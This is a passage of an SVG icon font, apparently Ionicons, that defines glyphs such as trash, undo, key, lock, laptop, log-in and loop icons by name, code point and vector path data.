d="M96 128c-26 0 -48 -22 -48 -48s22 -48 48 -48s48 22 48 48s-22 48 -48 48zM96 144v0c35 0 64 -29 64 -64s-29 -64 -64 -64s-64 29 -64 64s29 64 64 64zM351 160v0h-255c-44 0 -80 -36 -80 -80s36 -80 80 -80h256c44 0 80 36 80 80s-37 80 -81 80zM352 176v0
c53 0 96 -43 96 -96s-43 -96 -96 -96h-256c-53 0 -96 43 -96 96s43 96 96 96h256zM352 352c-26 0 -48 -22 -48 -48s22 -48 48 -48s48 22 48 48s-22 48 -48 48zM352 368v0c35 0 64 -29 64 -64s-29 -64 -64 -64s-64 29 -64 64s29 64 64 64zM97 384v0c-44 0 -81 -36 -81 -80
s36 -80 80 -80h256c44 0 80 36 80 80s-36 80 -80 80h-255zM96 400v0h256c53 0 96 -43 96 -96s-43 -96 -96 -96h-256c-53 0 -96 43 -96 96s43 96 96 96z" />
    <glyph glyph-name="ion-ios-toggle" unicode="&#xf4c3;" 
d="M96 128c26 0 48 -22 48 -48s-22 -48 -48 -48s-48 22 -48 48s22 48 48 48zM352 176c53 0 96 -43 96 -96s-43 -96 -96 -96h-256c-53 0 -96 43 -96 96s43 96 96 96h256zM96 16c35 0 64 29 64 64s-29 64 -64 64s-64 -29 -64 -64s29 -64 64 -64zM352 256c-26 0 -48 22 -48 48
s22 48 48 48s48 -22 48 -48s-22 -48 -48 -48zM96 208c-53 0 -96 43 -96 96s43 96 96 96h256c53 0 96 -43 96 -96s-43 -96 -96 -96h-256zM352 368c-35 0 -64 -29 -64 -64s29 -64 64 -64s64 29 64 64s-29 64 -64 64z" />
    <glyph glyph-name="ion-ios-trash-outline" unicode="&#xf4c4;" horiz-adv-x="288" 
d="M288 335v-15h-20l-24 -291c0 -16 -13 -29 -29 -29h-141c-16 0 -29 13 -29 29l-24 291h-21v15h80v20c0 16 13 29 29 29h70c16 0 29 -13 29 -29v-20h80zM95 355v-20h98v20c0 8 -6 14 -14 14h-70c-8 0 -14 -6 -14 -14zM230 30l23 290h-217l23 -290v0v-1c0 -8 7 -14 15 -14
h141c8 0 15 6 15 14v1v0zM137 47v241h14v-241h-14zM208 288l-11 -241h-14l10 241h15zM94 288l11 -241h-14l-11 241h14z" />
    <glyph glyph-name="ion-ios-trash" unicode="&#xf4c5;" horiz-adv-x="288" 
d="M208 335h80v-15h-20l-24 -291c0 -16 -13 -29 -29 -29h-141c-16 0 -29 13 -29 29l-24 291h-21v15h80v20c0 16 13 29 29 29h70c16 0 29 -13 29 -29v-20zM95 355v0v-20h98v20c0 8 -6 14 -14 14h-70c-8 0 -14 -6 -14 -14zM91 47h14l-11 241h-14zM151 47v241h-14v-241h14z
M197 47l11 241h-14l-11 -241h14z" />
    <glyph glyph-name="ion-ios-undo-outline" unicode="&#xf4c6;" horiz-adv-x="384" 
d="M384 80v-32h-10l-20 31c-20 33 -44 63 -75 77c-24 11 -47 19 -87 20v-80l-192 128l192 128v-80c63 -3 108 -21 143 -56c52 -53 49 -119 49 -136zM368 87c0 0 9 169 -192 169v65l-148 -97l148 -97v65c91 0 144 -24 192 -105z" />
    <glyph glyph-name="ion-ios-undo" unicode="&#xf4c7;" horiz-adv-x="384" 
d="M384 80v-32h-10l-20 31c-20 33 -44 63 -75 77c-24 11 -47 19 -87 20v-80l-192 128l192 128v-80c63 -3 108 -21 143 -56c52 -53 49 -119 49 -136z" />
    <glyph glyph-name="ion-ios-unlocked-outline" unicode="&#xf4c8;" horiz-adv-x="320" 
d="M160 160c18 0 32 -14 32 -32c0 -15 -10 -27 -24 -31v-33h-16v33c-14 4 -24 16 -24 31c0 18 14 32 32 32zM160 112c9 0 16 7 16 16s-7 16 -16 16s-16 -7 -16 -16s7 -16 16 -16zM72 224h248v-240h-320v240h56v72c0 57 47 104 104 104s104 -47 104 -104v-8h-16v8
c0 49 -39 88 -88 88s-88 -39 -88 -88v-72zM304 0v208h-288v-208h288z" />
    <glyph glyph-name="ion-ios-unlocked" unicode="&#xf4c9;" horiz-adv-x="320" 
d="M160 144c9 0 16 -7 16 -16s-7 -16 -16 -16s-16 7 -16 16s7 16 16 16zM72 224h248v-240h-320v240h56v72c0 57 47 104 104 104s104 -47 104 -104v-8h-16v8c0 49 -39 88 -88 88s-88 -39 -88 -88v-72zM168 97c14 4 24 16 24 31c0 18 -14 32 -32 32s-32 -14 -32 -32
c0 -15 10 -27 24 -31v-33h16v33z" />
    <glyph glyph-name="ion-ios-upload-outline" unicode="&#xf4ca;" horiz-adv-x="320" 
d="M192 304h128v-304h-320v304h128v-16h-112v-272h288v272h-112v16zM97 330l-11 12l74 74l74 -74l-11 -12l-55 55v-243h-16v243z" />
    <glyph glyph-name="ion-ios-upload" unicode="&#xf4cb;" horiz-adv-x="320" 
d="M168 304h152v-304h-320v304h152v-162h16v162zM168 385v-81h-16v81l-55 -55l-11 12l74 74l74 -74l-11 -12z" />
    <glyph glyph-name="ion-ios-videocam-outline" unicode="&#xf4cc;" horiz-adv-x="418" 
d="M257 320c19 0 33 -14 33 -33v-188c0 -19 -14 -35 -33 -35h-221c-19 0 -36 16 -36 35v188c0 19 17 33 36 33h221zM273 99v188c0 9 -8 16 -17 16h-221c-9 0 -18 -7 -18 -16v-188c0 -9 10 -18 19 -18h221c9 0 16 9 16 18zM320 235l98 53v-192l-98 53v86zM401 258v0l-64 -33
v-66l64 -33v132z" />
    <glyph glyph-name="ion-ios-videocam" unicode="&#xf4cd;" horiz-adv-x="418" 
d="M257 320c19 0 33 -14 33 -33v-188c0 -19 -14 -35 -33 -35h-221c-19 0 -36 16 -36 35v188c0 19 17 33 36 33h221zM320 235l98 53v-192l-98 53v86z" />
    <glyph glyph-name="ion-ios-volume-high" unicode="&#xf4ce;" horiz-adv-x="320" 
d="M278 320c26 -36 42 -80 42 -128s-16 -92 -42 -128l-14 10c24 33 39 74 39 118s-15 85 -39 118zM224 96l-14 10c18 24 29 54 29 86s-11 62 -29 86l14 10c20 -27 32 -60 32 -96s-12 -69 -32 -96zM177 128l-13 10c12 15 18 34 18 54s-6 39 -18 54l13 10
c14 -18 22 -40 22 -64s-8 -46 -22 -64zM58 232l70 56v-192l-70 56h-58v80h58z" />
    <glyph glyph-name="ion-ios-volume-low" unicode="&#xf4cf;" horiz-adv-x="128" 
d="M58 232l70 56v-192l-70 56h-58v80h58z" />
    <glyph glyph-name="ion-ios-wineglass-outline" unicode="&#xf4d0;" horiz-adv-x="192" 
d="M104 139v-155h72v-16h-80h-80v16h72v155c0 22 -20 39 -40 55c-8 6 -16 13 -22 19c-27 28 -26 52 -26 71v4c0 44 31 125 32 128h64h64c1 -3 32 -84 32 -128v-4c0 -19 1 -43 -26 -71c-6 -6 -14 -13 -22 -19c-20 -16 -40 -33 -40 -55zM43 400c-5 -16 -20 -63 -25 -96h156
c-5 33 -20 80 -25 96h-53h-53zM96 175c3 0 5 0 7 2v0c9 11 20 20 31 29c8 6 15 12 20 18c22 23 22 41 22 60v4h-160v-4c0 -19 0 -37 22 -60c5 -6 12 -12 20 -18c11 -9 22 -18 31 -29v0c2 -2 4 -2 7 -2z" />
    <glyph glyph-name="ion-ios-wineglass" unicode="&#xf4d1;" horiz-adv-x="192" 
d="M104 139v-155h72v-16h-80h-80v16h72v155c0 22 -20 39 -40 55c-8 6 -16 13 -22 19c-27 28 -26 52 -26 71v4c0 44 31 125 32 128h64h64c1 -3 32 -84 32 -128v-4c0 -19 1 -43 -26 -71c-6 -6 -14 -13 -22 -19c-20 -16 -40 -33 -40 -55zM43 400c-5 -16 -20 -63 -25 -96h156
c-5 33 -20 80 -25 96h-53h-53z" />
    <glyph glyph-name="ion-ios-world-outline" unicode="&#xf4d2;" horiz-adv-x="416" 
d="M208 400c115 0 208 -93 208 -208s-93 -208 -208 -208v0v0v0c-115 0 -208 93 -208 208s93 208 208 208v0v0v0zM216 276v-76h75c-1 31 -5 60 -11 84c-21 -5 -42 -7 -64 -8zM216 292c20 1 41 3 60 8c-14 46 -38 76 -60 82v-90zM200 382c-23 -6 -45 -36 -60 -82
c19 -5 39 -7 60 -8v90zM200 276c-22 1 -44 3 -65 8c-6 -24 -10 -53 -11 -84h76v76zM108 200c1 32 4 62 11 88c-21 6 -41 15 -59 25c-26 -31 -41 -70 -43 -113h91zM108 184h-91c2 -43 17 -82 43 -113c19 10 38 19 59 25c-7 26 -10 56 -11 88zM124 184c1 -31 5 -60 11 -84
c21 5 43 8 65 9v75h-76zM200 92c-21 -1 -41 -3 -60 -8c15 -46 37 -76 60 -82v90zM216 2c22 6 46 36 60 82c-19 5 -40 7 -60 8v-90zM216 109c22 -1 43 -4 64 -9c6 24 10 53 11 84h-75v-75zM308 184c-1 -32 -5 -62 -12 -88c21 -6 41 -15 60 -25c26 31 41 70 43 113h-91z
M308 200v0h91c-2 43 -17 82 -43 113c-19 -10 -38 -19 -59 -25c7 -26 10 -56 11 -88zM344 326c-25 25 -56 44 -91 52c16 -17 29 -43 39 -74c18 6 35 13 52 22zM163 378c-35 -8 -67 -27 -91 -52c16 -9 34 -15 52 -21c10 31 23 56 39 73zM72 58c25 -25 56 -44 91 -52
c-16 17 -30 43 -40 74c-18 -6 -35 -13 -51 -22zM253 6c35 8 66 27 91 52c-17 9 -34 16 -52 22c-10 -31 -23 -57 -39 -74z" />
    <glyph glyph-name="ion-ios-world" unicode="&#xf4d3;" horiz-adv-x="416" 
d="M208 400c115 0 208 -93 208 -208s-93 -208 -208 -208v0v0v0c-115 0 -208 93 -208 208s93 208 208 208v0v0v0zM208 1c106 0 191 85 191 191s-85 191 -191 191v0v0v0c-106 0 -191 -85 -191 -191s86 -191 191 -191v0v0v0zM274 276c6 -22 9 -48 10 -76h-68v68c20 1 39 4 58 8
zM216 366c20 -6 41 -34 54 -75c-17 -4 -36 -6 -54 -7v82zM145 291c13 42 35 69 55 75v-82c-19 1 -37 3 -55 7zM333 315c-15 -8 -31 -15 -48 -20c-9 29 -21 52 -36 67c32 -8 61 -24 84 -47zM299 200c-1 29 -4 56 -10 80c19 6 37 14 54 23c23 -28 38 -64 40 -103h-84zM132 200
c1 28 3 54 9 76c19 -5 39 -7 59 -8v-68h-68zM284 184c-1 -28 -4 -54 -10 -76c-19 5 -38 7 -58 8v68h68zM141 108c-6 22 -8 48 -9 76h68v-68c-20 -1 -40 -3 -59 -8zM200 18c-20 6 -42 33 -55 75c18 4 36 6 55 7v-82zM249 22c15 15 27 38 36 67c17 -5 33 -11 48 -19
c-23 -23 -52 -40 -84 -48zM167 362c-15 -15 -27 -39 -36 -67c-16 5 -33 11 -48 19c22 23 52 40 84 48zM289 104c6 24 9 51 10 80h84c-2 -39 -17 -75 -40 -103c-17 9 -35 17 -54 23zM216 100c18 -1 37 -3 54 -7c-13 -42 -34 -69 -54 -75v82zM127 280c-6 -24 -11 -51 -11 -80
h-83c2 39 17 75 40 103c17 -9 35 -17 54 -23zM116 184c1 -29 4 -56 10 -80c-19 -6 -36 -14 -53 -23c-23 28 -38 64 -40 103h83zM83 70c15 8 32 14 48 19c9 -28 21 -52 36 -67c-32 8 -62 25 -84 48z" />
    <glyph glyph-name="ion-ipad" unicode="&#xf1f9;" horiz-adv-x="288" 
d="M0 375c0 5 4 9 9 9h270c5 0 9 -4 9 -9v-366c0 -5 -4 -9 -9 -9h-270c-5 0 -9 4 -9 9v366zM144 10c8 0 14 6 14 14s-7 14 -14 14c-8 0 -14 -6 -14 -14s6 -14 14 -14zM32 329v-275c0 -4 3 -6 6 -6h211c3 0 7 2 7 6v275c0 4 -4 7 -7 7h-211c-3 0 -6 -3 -6 -7z" />
    <glyph glyph-name="ion-iphone" unicode="&#xf1fa;" horiz-adv-x="192" 
d="M168 384c13 0 24 -11 24 -24v-336c0 -13 -11 -24 -24 -24h-144c-13 0 -24 11 -24 24v336c0 13 11 24 24 24h144zM80 348v0c0 -2 2 -4 4 -4h24c2 0 4 2 4 4v0c0 2 -2 4 -4 4h-24c-2 0 -4 -2 -4 -4zM68 352c-2 0 -4 -2 -4 -4s2 -4 4 -4s4 2 4 4s-2 4 -4 4zM96 16
c9 0 16 7 16 16s-7 16 -16 16s-16 -7 -16 -16s7 -16 16 -16zM176 64v256h-160v-256h160z" />
    <glyph glyph-name="ion-ipod" unicode="&#xf1fb;" horiz-adv-x="224" 
d="M112 137c18 0 32 -14 32 -32s-14 -32 -32 -32s-32 14 -32 32s14 32 32 32zM196 384c15 0 28 -12 28 -28v-328c0 -16 -13 -28 -28 -28h-168c-15 0 -28 12 -28 28v328c0 16 13 28 28 28h168zM112 32c40 0 72 32 72 72s-32 72 -72 72s-72 -32 -72 -72s32 -72 72 -72z
M192 221v118c-1 7 -6 12 -12 13h-136c-7 -1 -12 -7 -12 -15v-114c0 -8 6 -15 14 -15h131c8 0 14 5 15 13z" />
    <glyph glyph-name="ion-jet" unicode="&#xf295;" horiz-adv-x="326" 
d="M222 80l-2 -13l53 -58l-18 -27l-74 9l-18 -55l-19 55l-73 -9l-18 27l53 58l-2 13l-104 -35l3 53l114 103s26 173 28 192c5 40 18 55 18 55s13 -15 18 -55c2 -19 28 -192 28 -192l114 -103l3 -53z" />
    <glyph glyph-name="ion-key" unicode="&#xf296;" horiz-adv-x="192" 
d="M144 147c28 -17 48 -48 48 -83c0 -53 -43 -96 -96 -96s-96 43 -96 96c0 36 19 67 48 84c0 0 7 16 12 41c0 4 11 6 11 12v20c0 5 -7 9 -7 11v8v8c0 2 0 4 1 6c0 1 1 1 1 2l2 1l4 4v1c2 2 3 4 3 6c0 1 1 8 1 9c0 3 -2 6 -4 8l-1 1l-4 4v0l-1 1v0c-2 2 -3 5 -3 8v7
c0 3 2 7 4 9v0l5 5v0c2 2 4 3 4 6v24c0 3 -2 6 -4 8v1l-4 4l-1 1c-2 2 -3 5 -3 8v18c0 11 0 19 9 23c3 1 14 3 23 3c20 0 30 -8 32 -36c0 0 7 -81 9 -143s7 -90 7 -90zM96 0c18 0 32 14 32 32s-14 32 -32 32s-32 -14 -32 -32s14 -32 32 -32z" />
    <glyph glyph-name="ion-knife" unicode="&#xf297;" horiz-adv-x="64" 
d="M62 416c2 0 2 -1 2 -6v-412c0 -15 -10 -30 -24 -30v0v0c-14 0 -24 15 -24 30c1 19 14 83 16 130v0c1 30 -32 31 -32 70c0 134 35 191 54 214c2 2 5 4 8 4z" />
    <glyph glyph-name="ion-laptop" unicode="&#xf1fc;" horiz-adv-x="512" 
d="M480 342v-262h-448v262c0 6 4 10 10 10h428c6 0 10 -4 10 -10zM448 112v208h-384v-208h384zM0 59v5h512v-5c-70 -20 -116 -27 -256 -27s-186 7 -256 27z" />
    <glyph glyph-name="ion-leaf" unicode="&#xf1fd;" horiz-adv-x="422" 
d="M412 69c18 -3 10 -41 -5 -39c0 0 -21 -1 -63 12c0 0 -16 -19 -39 -30c-26 -12 -118 -33 -197 38c-108 97 -120 354 -100 333c86 -90 197 -47 270 -106c55 -44 88 -127 77 -192c0 0 5 -8 57 -16zM316 65c5 5 10 16 10 24c-161 52 -252 160 -252 160s104 -143 242 -184z
" />
    <glyph glyph-name="ion-levels" unicode="&#xf298;" horiz-adv-x="350" 
d="M46 349c11 -5 18 -16 18 -29s-7 -24 -18 -29v-275c0 -9 -7 -16 -16 -16s-16 7 -16 16v278c-8 6 -14 15 -14 26s6 20 14 26v22c0 9 7 16 16 16s16 -7 16 -16v-19zM142 155c9 -6 15 -16 15 -27s-6 -21 -15 -27v-85c0 -9 -7 -16 -16 -16s-16 7 -16 16v84
c-10 5 -17 16 -17 28s7 23 17 28v212c0 9 7 16 16 16s16 -7 16 -16v-213zM238 285c10 -6 16 -16 16 -28s-6 -22 -16 -28v-213c0 -9 -7 -16 -16 -16s-16 7 -16 16v213c-10 6 -16 16 -16 28s6 22 16 28v83c0 9 7 16 16 16s16 -7 16 -16v-83zM350 65c0 -12 -6 -22 -16 -28v-21
c0 -9 -7 -16 -16 -16s-16 7 -16 16v21c-10 6 -16 16 -16 28s6 22 16 28v275c0 9 7 16 16 16s16 -7 16 -16v-275c10 -6 16 -16 16 -28z" />
    <glyph glyph-name="ion-lightbulb" unicode="&#xf299;" horiz-adv-x="256" 
d="M128 416c71 0 128 -56 128 -124c0 -5 0 -9 -1 -14s-2 -11 -3 -16v-2c-17 -63 -45 -71 -59 -167v-1c-2 -9 -10 -12 -20 -12h-90c-10 0 -18 3 -20 12v1c-14 96 -42 104 -59 167v2c-1 5 -2 11 -3 16s-1 9 -1 14c0 68 57 124 128 124zM190 52v-1c-2 -3 -3 -4 -3 -7s1 -5 3 -8
v-1c1 -2 2 -3 2 -5s-1 -4 -2 -6v-1c-2 -3 -3 -4 -3 -7s1 -5 3 -8v-1c1 -2 2 -4 2 -6c0 -5 -4 -9 -10 -11h-1c-6 -1 -13 -2 -19 -3h-2c-6 -1 -11 -5 -14 -9v0c-4 -5 -10 -10 -18 -10s-15 6 -19 11v0c-3 4 -7 7 -13 8h-2c-6 1 -13 2 -19 3h-1c-6 2 -10 6 -10 11c0 2 1 4 2 6v1
c2 2 3 4 3 7s-1 5 -3 8v1c-1 2 -2 4 -2 6s1 3 2 5v1c2 3 3 5 3 8s-1 4 -3 7v1v0c-1 2 -2 4 -2 6c0 4 -1 6 7 6h114c8 0 7 -2 7 -6c0 -2 -1 -4 -2 -6v0z" />
    <glyph glyph-name="ion-link" unicode="&#xf1fe;" horiz-adv-x="384" 
d="M192 240v0v0v0zM304 288c44 0 80 -36 80 -80v-32c0 -44 -36 -80 -80 -80h-112c-33 0 -60 20 -73 48c-4 10 -7 20 -7 32v32h48v-32c0 -18 14 -32 32 -32h112c18 0 32 14 32 32v32c0 18 -14 32 -32 32v0h-16c-6 31 -32 48 -32 48h48zM266 240c4 -10 6 -21 6 -32v-32v0h-48
v0v32c0 18 -14 32 -32 32v0h-112c-18 0 -32 -14 -32 -32v-32c0 -18 14 -32 32 -32h16c6 -31 32 -48 32 -48h-48c-44 0 -80 36 -80 80v32c0 44 36 80 80 80h112c33 0 62 -20 74 -48z" />
    <glyph glyph-name="ion-load-a" unicode="&#xf29a;" horiz-adv-x="384" 
d="M144 352c0 43 21 64 64 64s64 -21 64 -64s-21 -64 -64 -64s-64 21 -64 64zM0 192c0 32 16 48 48 48s48 -16 48 -48s-16 -48 -48 -48s-48 16 -48 48zM312 304c0 5 3 8 8 8s8 -3 8 -8s-3 -8 -8 -8s-8 3 -8 8zM132 340c10 -10 15 -22 15 -36s-5 -26 -15 -36s-22 -15 -36 -15
s-26 5 -36 15s-15 22 -15 36s5 26 15 36s22 15 36 15s26 -5 36 -15zM352 192c0 11 5 16 16 16s16 -5 16 -16s-5 -16 -16 -16s-16 5 -16 16zM297 79c0 16 8 24 24 24s24 -8 24 -24s-8 -24 -24 -24s-24 8 -24 24zM176 32c0 21 11 32 32 32s32 -11 32 -32s-11 -32 -32 -32
s-32 11 -32 32zM56 80c0 27 13 40 40 40s40 -13 40 -40s-13 -40 -40 -40s-40 13 -40 40z" />
    <glyph glyph-name="ion-load-b" unicode="&#xf29b;" 
d="M256 288c0 -18 -14 -32 -32 -32v0c-18 0 -32 14 -32 32v96c0 18 14 32 32 32v0c18 0 32 -14 32 -32v-96zM224 128v0c18 0 32 -14 32 -32v-96c0 -18 -14 -32 -32 -32s-32 14 -32 32v96c0 18 14 32 32 32zM416 224v0c18 0 32 -14 32 -32s-14 -32 -32 -32h-96
c-18 0 -32 14 -32 32s14 32 32 32h96zM128 224v0c18 0 32 -14 32 -32s-14 -32 -32 -32h-96c-18 0 -32 14 -32 32s14 32 32 32h96zM314 237c-12 -12 -33 -12 -45 0v0c-12 12 -12 34 0 46l68 67c12 12 33 12 45 0v0c12 -12 12 -33 0 -45zM179 147v0c12 -12 12 -33 0 -46
l-68 -67c-12 -12 -33 -12 -45 0s-12 33 0 45l67 68c12 12 34 12 46 0zM382 79v0c12 -12 12 -33 0 -45s-33 -12 -45 0l-68 68c-12 12 -12 33 0 45s33 12 45 0zM179 282v0c12 -12 12 -33 0 -45s-34 -12 -46 0l-67 68c-12 12 -12 33 0 45s33 12 45 0z" />
    <glyph glyph-name="ion-load-c" unicode="&#xf29c;" 
d="M448 222c0 -3 0 -6 -1 -9c-4 -8 -15 -12 -23 -7c-4 2 -6 7 -7 11c-1 5 -1 9 -2 14c-4 20 -12 40 -22 58c-12 21 -28 41 -47 56c-18 15 -40 26 -62 33c-21 6 -42 9 -64 9h-4c-3 0 -6 -1 -9 -1c-6 0 -14 -1 -20 -2c-13 -2 -25 -6 -37 -11c-21 -8 -40 -20 -57 -35
s-31 -33 -42 -52c-12 -22 -20 -45 -24 -70c-2 -11 -2 -23 -2 -34c0 -6 0 -11 1 -16c1 -6 2 -13 3 -19c5 -24 14 -47 28 -67c13 -20 29 -38 48 -52c20 -15 42 -26 65 -33c25 -7 50 -9 76 -7c25 2 50 9 73 20c11 5 22 12 32 19s19 15 27 24c4 4 8 9 12 14s7 10 10 15
c6 10 12 20 17 31c4 8 8 16 11 25c2 4 3 9 4 13s1 7 2 11c1 -9 1 -18 -1 -26c-1 -5 -2 -11 -4 -16c-1 -5 -3 -10 -5 -15c-4 -10 -8 -19 -13 -28c-6 -11 -12 -21 -20 -30s-16 -18 -25 -26c-18 -15 -40 -27 -62 -36c-23 -9 -48 -14 -73 -15s-51 3 -75 11c-23 7 -45 19 -65 33
c-19 14 -36 31 -50 50c-7 10 -13 20 -18 31s-9 21 -13 33c-6 18 -9 37 -10 56c-1 20 1 39 5 58c5 24 15 47 28 68c12 19 26 35 42 50s35 27 55 36c23 11 48 19 74 21c10 1 19 1 29 1c13 0 26 -2 38 -4c24 -5 47 -14 68 -26s41 -29 57 -48c15 -18 27 -37 36 -58
c4 -10 7 -21 10 -32c2 -8 5 -17 6 -26z" />
    <glyph glyph-name="ion-load-d" unicode="&#xf29d;" horiz-adv-x="384" 
d="M368 208c9 0 16 -7 16 -16s-7 -16 -16 -16h-80c-9 0 -16 7 -16 16s7 16 16 16h80zM112 192c0 -9 -7 -16 -16 -16h-80c-9 0 -16 7 -16 16s7 16 16 16h80c9 0 16 -7 16 -16zM192 112c9 0 16 -7 16 -16v-80c0 -9 -7 -16 -16 -16s-16 7 -16 16v80c0 9 7 16 16 16zM192 384
c9 0 16 -7 16 -16v-80c0 -9 -7 -16 -16 -16s-16 7 -16 16v80c0 9 7 16 16 16zM261 232c-4 8 -2 18 6 22l69 40c8 4 18 2 22 -6s2 -18 -6 -22l-69 -40c-8 -4 -18 -2 -22 6zM123 152c4 -8 2 -18 -6 -22l-69 -40c-8 -4 -18 -2 -22 6s-2 18 6 22l69 40c8 4 18 2 22 -6zM254 117
l40 -69c4 -8 2 -18 -6 -22s-18 -2 -22 6l-40 69c-4 8 -2 18 6 22s18 2 22 -6zM118 352l40 -69c4 -8 2 -18 -6 -22s-18 -2 -22 6l-40 69c-4 8 -2 18 6 22s18 2 22 -6zM232 261c-8 4 -10 14 -6 22l40 69c4 8 14 10 22 6s10 -14 6 -22l-40 -69c-4 -8 -14 -10 -22 -6zM152 123
c8 -4 10 -14 6 -22l-40 -69c-4 -8 -14 -10 -22 -6s-10 14 -6 22l40 69c4 8 14 10 22 6zM352 118c8 -4 10 -14 6 -22s-14 -10 -22 -6l-69 40c-8 4 -10 14 -6 22s14 10 22 6zM32 266c-8 4 -10 14 -6 22s14 10 22 6l69 -40c8 -4 10 -14 6 -22s-14 -10 -22 -6z" />
    <glyph glyph-name="ion-location" unicode="&#xf1ff;" horiz-adv-x="239" 
d="M119 384c66 0 120 -54 120 -120c0 -115 -120 -264 -120 -264s-119 149 -119 264c0 66 53 120 119 120zM119 206c31 0 57 25 57 56s-26 57 -57 57s-56 -26 -56 -57s25 -56 56 -56z" />
    <glyph glyph-name="ion-lock-combination" unicode="&#xf4d4;" horiz-adv-x="384" 
d="M320 271c39 -35 64 -86 64 -143c0 -106 -86 -192 -192 -192s-192 86 -192 192c0 57 25 108 64 143v49c0 71 57 128 128 128s128 -57 128 -128v-49zM96 320v-26c28 16 61 26 96 26s68 -10 96 -26v26c0 53 -43 96 -96 96s-96 -43 -96 -96zM192 -32c88 0 160 72 160 160
s-72 160 -160 160s-160 -72 -160 -160s72 -160 160 -160zM192 272c80 0 144 -64 144 -144s-64 -144 -144 -144s-144 64 -144 144s64 144 144 144zM315 95c2 9 4 18 4 29h-7v7h8c0 11 -2 20 -5 30l-25 -7l-4 12l25 8c-4 10 -8 18 -14 26l-11 -8l-4 6l11 8c-6 8 -13 16 -21 22
l-15 -21l-11 8l15 20c-8 6 -17 11 -27 14l-4 -13l-6 2l5 13c-9 3 -20 5 -29 5v-13v-6h-16v6v13c-11 -1 -19 -2 -29 -5l4 -12l-6 -2l-4 12c-10 -3 -19 -8 -27 -14l15 -20l-10 -8l-15 21c-8 -6 -16 -14 -22 -22l11 -8l-4 -5l-10 8c-6 -8 -10 -17 -14 -27l24 -8l-5 -12l-25 7
c-3 -10 -3 -19 -3 -30h6v-7h-5c0 -11 2 -20 4 -29l24 7l4 -12l-24 -8c4 -10 8 -19 14 -27l9 7l4 -5l-9 -7c6 -8 13 -16 21 -22l15 21l10 -8l-15 -20c8 -5 17 -11 27 -14l3 11l7 -2l-4 -11c10 -3 18 -4 29 -5v13v6h16v-6v-13c9 1 19 2 29 5l-5 12l6 2l4 -12c10 3 19 8 27 14
l-15 20l11 8l15 -21c8 6 15 14 21 22l-11 7l4 6l10 -8c6 8 11 17 15 27l-25 8l4 12zM111 128c0 54 27 81 81 81s81 -27 81 -81s-27 -81 -81 -81s-81 27 -81 81z" />
    <glyph glyph-name="ion-locked" unicode="&#xf200;" horiz-adv-x="384" 
d="M22 -32c-12 0 -22 10 -22 22v212c0 12 10 22 22 22h3h19v31c0 42 17 87 43 115s64 46 105 46v0v0c41 0 79 -18 105 -46s43 -73 43 -115v-31h22c12 0 22 -10 22 -22v-212c0 -12 -10 -22 -22 -22h-340zM97 255v-31h17h155h18v31c0 27 -10 61 -28 80v0v1
c-18 19 -42 29 -67 29v0v0c-25 0 -49 -10 -67 -29v-1v0c-18 -19 -28 -53 -28 -80z" />
    <glyph glyph-name="ion-log-in" unicode="&#xf29e;" 
d="M224 416c124 0 224 -100 224 -224s-100 -224 -224 -224c-96 0 -177 60 -209 144h34c9 -20 23 -40 39 -56c36 -36 85 -56 136 -56s100 20 136 56s56 85 56 136s-20 100 -56 136s-85 56 -136 56s-100 -20 -136 -56c-16 -16 -30 -36 -39 -56h-34c32 84 113 144 209 144z
M175 124l52 52h-227v32h227l-52 52l22 23l91 -91l-91 -91z" />
    <glyph glyph-name="ion-log-out" unicode="&#xf29f;" 
d="M335 124l52 52h-227v32h227l-52 52l22 23l91 -91l-91 -91zM359 56c3 3 6 5 8 8h41c-40 -58 -108 -96 -184 -96c-124 0 -224 100 -224 224s100 224 224 224c76 0 144 -38 184 -96h-41c-2 3 -5 5 -8 8c-36 36 -84 56 -135 56s-100 -20 -136 -56s-56 -85 -56 -136
s20 -100 56 -136s85 -56 136 -56s99 20 135 56z" />
    <glyph glyph-name="ion-loop" unicode="&#xf201;" horiz-adv-x="334" 
d="M184 148v-58c49 8 86 50 86 102c0 16 -4 30 -10 44c-3 6 -5 12 -9 17l47 43c1 -1 2 -3 3 -4c21 -28 33 -62 33 -100v-4c-2 -72 -47 -131 -111 -154c-12 -4 -26 -8 -39 -9v-57l-76 67l-26 23l44 39zM0 196c2 72 48 133 113 155c12 4 24 7 37 8v57l76 -67l26 -23l-44 -39
l-59 -51l1 58c-49 -8 -86 -51 -86 -102c0 -16 4 -31 10 -45c3 -6 5 -11 9 -16l-47 -44c-1 2 -2 3 -3 5c-20 28 -33 63 -33 100v4z" />
    <glyph glyph-name="ion-magnet" unicode="&#xf2a0;" horiz-adv-x="384" 
d="M192 416c115 0 192 -78 192 -200c0 -49 -3 -77 -15 -128c-16 -66 -39 -113 -39 -113v-1c-2 -3 -6 -6 -10 -6c-1 0 -3 1 -4 1l-2 1l-50 20l-2 1c-3 2 -5 5 -5 9c0 1 0 3 1 4v1c7 16 27 59 37 101s13 63 13 108c0 71 -52 122 -116 122s-116 -51 -116 -122
c0 -45 3 -66 13 -108s30 -85 37 -101v-1c1 -1 1 -3 1 -4c0 -4 -2 -7 -5 -9l-2 -1l-50 -20l-2 -1c-1 0 -3 -1 -4 -1c-4 0 -8 3 -10 6v1s-24 47 -40 113c-12 51 -14 79 -14 128c0 122 77 200 192 200zM109 4c-9 19 -27 59 -36 98l-42 -12c13 -53 30 -92 35 -104l43 17v1z
M317 -14c5 12 23 51 36 104l-43 12c-9 -39 -26 -79 -35 -98v-1z" />
    <glyph glyph-name="ion-male" unicode="&#xf2a1;" 
d="M448 256l-63 63l-69 -69c22 -30 36 -66 36 -106c0 -97 -79 -176 -176 -176s-176 79 -176 176s79 176 176 176c40 0 76 -14 106 -36l69 69l-63 63h160v-160zM266 54c24 24 38 56 38 90s-14 66 -38 90s-56 38 -90 38s-66 -14 -90 -38s-38 -56 -38 -90s14 -66 38 -90
s56 -38 90 -38s66 14 90 38z" />
    <glyph glyph-name="ion-man" unicode="&#xf202;" horiz-adv-x="168" 
d="M84 341c-21 0 -37 17 -37 38s16 37 37 37s37 -16 37 -37s-16 -38 -37 -38zM121 333c28 0 47 -24 47 -48v-114c0 -22 -32 -22 -32 0v105h-5v-286c0 -28 -41 -31 -43 0v165h-1h-7v-165c-1 -29 -43 -30 -43 0v286h-6v-105c0 -22 -31 -22 -31 0v114c0 24 19 48 47 48h37h37z
" />
    <glyph glyph-name="ion-map" unicode="&#xf203;" 
